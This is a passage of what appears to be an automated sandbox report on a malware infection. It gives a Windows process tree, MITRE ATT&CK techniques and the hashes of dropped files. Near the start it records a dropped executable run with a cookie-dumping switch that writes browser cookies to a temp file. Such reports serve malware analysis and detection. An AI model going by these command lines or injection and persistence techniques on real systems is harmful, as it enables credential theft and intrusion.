                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:6076
                                                                          • \??\c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                            1⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1056
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                              2⤵
                                                                              • Drops file in System32 directory
                                                                              • Checks processor information in registry
                                                                              • Modifies data under HKEY_USERS
                                                                              • Modifies registry class
                                                                              PID:3412
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                            1⤵
                                                                            • Drops file in Windows directory
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4760
                                                                          • C:\Windows\system32\browser_broker.exe
                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            PID:5044
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4728
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                              PID:1212
                                                                            • C:\Windows\system32\werfault.exe
                                                                              werfault.exe /h /shared Global\2343c17cb0fb4c8482d662f3da2ad51d /t 0 /p 1212
                                                                              1⤵
                                                                                PID:3080
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies Internet Explorer settings
                                                                                • Modifies registry class
                                                                                PID:1320
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:4192
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                  PID:3492
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                    PID:3928
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                    1⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    PID:1900
                                                                                  • C:\Users\Admin\AppData\Local\Temp\4D51.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\4D51.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:6100
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      2⤵
                                                                                        PID:4984
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5272.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\5272.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:4160
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5794.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\5794.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5236
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5E0D.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\5E0D.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6044
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1171344888.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\1171344888.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5796
                                                                                      • C:\Users\Admin\AppData\Local\Temp\397771211.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\397771211.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5508
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:6064
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                          PID:4944
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:6124
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:3140
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:3496
                                                                                            • C:\Windows\system32\OpenWith.exe
                                                                                              C:\Windows\system32\OpenWith.exe -Embedding
                                                                                              1⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:5376
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5396
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:4360
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4848
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:3856
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                  1⤵
                                                                                                    PID:6052
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                    1⤵
                                                                                                      PID:5160
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4980
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:3844
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4836
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:5728
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:4296

                                                                                                      Network

                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                      Persistence

                                                                                                      Registry Run Keys / Startup Folder

                                                                                                      1
                                                                                                      T1060

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Defense Evasion

                                                                                                      Modify Registry

                                                                                                      3
                                                                                                      T1112

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Install Root Certificate

                                                                                                      1
                                                                                                      T1130

                                                                                                      Credential Access

                                                                                                      Credentials in Files

                                                                                                      4
                                                                                                      T1081

                                                                                                      Discovery

                                                                                                      Software Discovery

                                                                                                      1
                                                                                                      T1518

                                                                                                      Query Registry

                                                                                                      4
                                                                                                      T1012

                                                                                                      System Information Discovery

                                                                                                      5
                                                                                                      T1082

                                                                                                      Security Software Discovery

                                                                                                      1
                                                                                                      T1063

                                                                                                      Peripheral Device Discovery

                                                                                                      1
                                                                                                      T1120

                                                                                                      Remote System Discovery

                                                                                                      1
                                                                                                      T1018

                                                                                                      Collection

                                                                                                      Data from Local System

                                                                                                      4
                                                                                                      T1005

                                                                                                      Command and Control

                                                                                                      Web Service

                                                                                                      1
                                                                                                      T1102

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files\Java\ZGSCYGJGJM\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Program Files\Java\ZGSCYGJGJM\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Program Files\install.dat
                                                                                                        MD5

                                                                                                        806c3221a013fec9530762750556c332

                                                                                                        SHA1

                                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                        SHA256

                                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                        SHA512

                                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                      • C:\Program Files\install.dat
                                                                                                        MD5

                                                                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                                                                        SHA1

                                                                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                        SHA256

                                                                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                        SHA512

                                                                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                      • C:\Program Files\install.dll
                                                                                                        MD5

                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                        SHA1

                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                        SHA256

                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                        SHA512

                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                      • C:\Program Files\install.dll
                                                                                                        MD5

                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                        SHA1

                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                        SHA256

                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                        SHA512

                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                      • C:\Program Files\libEGL.dll
                                                                                                        MD5

                                                                                                        cc0f81a657d6887e246f49151e60123d

                                                                                                        SHA1

                                                                                                        1eb31528501c375817853e09d95b7152858c5b31

                                                                                                        SHA256

                                                                                                        31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                        SHA512

                                                                                                        8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                        MD5

                                                                                                        4c8fe6b2f96e01a5a6d418a7f1c843a7

                                                                                                        SHA1

                                                                                                        51842e81863c205e888bffe034a3abbf642c5419

                                                                                                        SHA256

                                                                                                        e6272d58a61f01f31f18f7b4ecc85232a1e71be4b9e93570395ad825e5ca6afa

                                                                                                        SHA512

                                                                                                        209986a1b77f039dac3c4e51a7c2a54af77b47261373e4f97290c8de21511dc181549ce656585c546ef616922aef5ee88f9d3cc98ae98e2b426dd4072688824a

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                        MD5

                                                                                                        3caa69cfe89abfd90bdce40ad5b137b7

                                                                                                        SHA1

                                                                                                        ae6fc20857170e4edeca2abb966b17390040a20b

                                                                                                        SHA256

                                                                                                        c834c22efe48ce7949fb75a0dd3447b6b7cd5fc75e8633b111fc49e34cc454bf

                                                                                                        SHA512

                                                                                                        548165bba3fdcadb8b1906e0570b3de4e17eb62298d54beda7b406d0e5723e78023c3c998c2152a18b0625869433b416604f4c515d7cedf935ebd2995b946e12

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                        MD5

                                                                                                        60f6b2c801a2a958b06c893b74b19282

                                                                                                        SHA1

                                                                                                        da0e286f2d50cc4f731f3fcec60de23069faf17f

                                                                                                        SHA256

                                                                                                        593de34d0c7012a797f118d197186c85f0bd1fd4d3a70fa84e3ea89f9f980032

                                                                                                        SHA512

                                                                                                        406ca703da00617705fbe0c5b9f6be656fffd3f43a8f68e6ccff78e24e5ef8b024f3f2dd1a28d63888abab10aacdab3a78bce0f2656e08b373e4ef8b0717833d

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                        MD5

                                                                                                        f5a543c9a92bf83b5fed48b8cd4583c0

                                                                                                        SHA1

                                                                                                        b82dcec650688499df33cee3f7cdd92aaf46db59

                                                                                                        SHA256

                                                                                                        4592c5b099da1b8f3de88895e4c5edc38e7b41f495667f0f9d2c1e8705619b2e

                                                                                                        SHA512

                                                                                                        2a7ff6073db165eb096021340a5ccf7f17cdc92cae9432ed3d111f68fbc884873c9f42bfd5fd07fbe863e8a8d4454333fbad0ee877a538c383b00e8fb504bb5e

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                        MD5

                                                                                                        6f90c091e3b914bed8b7a6a604b8649c

                                                                                                        SHA1

                                                                                                        b48bf86e91dd1749471f01926053e70cab0d0151

                                                                                                        SHA256

                                                                                                        21af4f060bf6a16a8b74a43118cfa092ea300e7a37e97b4c802cc0a8232c742e

                                                                                                        SHA512

                                                                                                        6d1387b10cd1f5692ecc99004802ec04a838157d9750a16aac9c7fdbce613fef9d00d51e4ac720ca6ace7a6cf815cce5d8a5f7e9a741ede4688b3199203bf77c

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                        MD5

                                                                                                        544cab397bff6998e8e1646907cdb105

                                                                                                        SHA1

                                                                                                        bb5d4877142b73310c0d98722aceaf9546ce3f38

                                                                                                        SHA256

                                                                                                        acc6908bce99b84de18a4f085b3e0b990cf94b40b76c3029806a1c5369c447a3

                                                                                                        SHA512

                                                                                                        2fe06a4ef6a2f5e958875933e34c5a8f70c4a8d2679304215056539526181590ccc480a38ee2fa429c2802c422d021eb9c54243b82e2c499b45c9efb74e74914

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\06-3a433-7dd-a2484-6e939f7db40ae\ZHaelaehaewudae.exe
                                                                                                        MD5

                                                                                                        b13abfab75b4ac0c6d13856bf66cdced

                                                                                                        SHA1

                                                                                                        54e54f12d4b0904c37385dbd9e7d14664ef43248

                                                                                                        SHA256

                                                                                                        ba8578d0f769689646a0f5a70f72bf9c397fa2908325a5b264da8d1d36c17940

                                                                                                        SHA512

                                                                                                        c0c1ff455193e331ce3c21dd80d9529d692d0bdf02f15c36a918256830bed82277f347731940ecc237526c2653ce976d8c96e1123f5d42dcbfb3e8b5380fc7d0

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\06-3a433-7dd-a2484-6e939f7db40ae\ZHaelaehaewudae.exe
                                                                                                        MD5

                                                                                                        b13abfab75b4ac0c6d13856bf66cdced

                                                                                                        SHA1

                                                                                                        54e54f12d4b0904c37385dbd9e7d14664ef43248

                                                                                                        SHA256

                                                                                                        ba8578d0f769689646a0f5a70f72bf9c397fa2908325a5b264da8d1d36c17940

                                                                                                        SHA512

                                                                                                        c0c1ff455193e331ce3c21dd80d9529d692d0bdf02f15c36a918256830bed82277f347731940ecc237526c2653ce976d8c96e1123f5d42dcbfb3e8b5380fc7d0

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\06-3a433-7dd-a2484-6e939f7db40ae\ZHaelaehaewudae.exe.config
                                                                                                        MD5

                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                        SHA1

                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                        SHA256

                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                        SHA512

                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1w34ejar.d3x\google-game.exe
                                                                                                        MD5

                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                        SHA1

                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                        SHA256

                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                        SHA512

                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1w34ejar.d3x\google-game.exe
                                                                                                        MD5

                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                        SHA1

                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                        SHA256

                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                        SHA512

                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\48-9861c-bd5-359a7-f0b9e1cde5257\Gepoxyzhyku.exe
                                                                                                        MD5

                                                                                                        c1671cfbdbd5de53b60feb041f290a7d

                                                                                                        SHA1

                                                                                                        7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                        SHA256

                                                                                                        53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                        SHA512

                                                                                                        751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\48-9861c-bd5-359a7-f0b9e1cde5257\Gepoxyzhyku.exe
                                                                                                        MD5

                                                                                                        c1671cfbdbd5de53b60feb041f290a7d

                                                                                                        SHA1

                                                                                                        7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                        SHA256

                                                                                                        53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                        SHA512

                                                                                                        751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\48-9861c-bd5-359a7-f0b9e1cde5257\Gepoxyzhyku.exe.config
                                                                                                        MD5

                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                        SHA1

                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                        SHA256

                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                        SHA512

                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\48-9861c-bd5-359a7-f0b9e1cde5257\Kenessey.txt
                                                                                                        MD5

                                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                                        SHA1

                                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                        SHA256

                                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                        SHA512

                                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                        MD5

                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                        SHA1

                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                        SHA256

                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                        SHA512

                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                        MD5

                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                        SHA1

                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                        SHA256

                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                        SHA512

                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                        MD5

                                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                                        SHA1

                                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                        SHA256

                                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                        SHA512

                                                                                                        f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                        MD5

                                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                                        SHA1

                                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                        SHA256

                                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                        SHA512

                                                                                                        f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                        MD5

                                                                                                        3bc84c0e8831842f2ae263789217245d

                                                                                                        SHA1

                                                                                                        d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                        SHA256

                                                                                                        757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                        SHA512

                                                                                                        f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                        MD5

                                                                                                        3bc84c0e8831842f2ae263789217245d

                                                                                                        SHA1

                                                                                                        d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                        SHA256

                                                                                                        757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

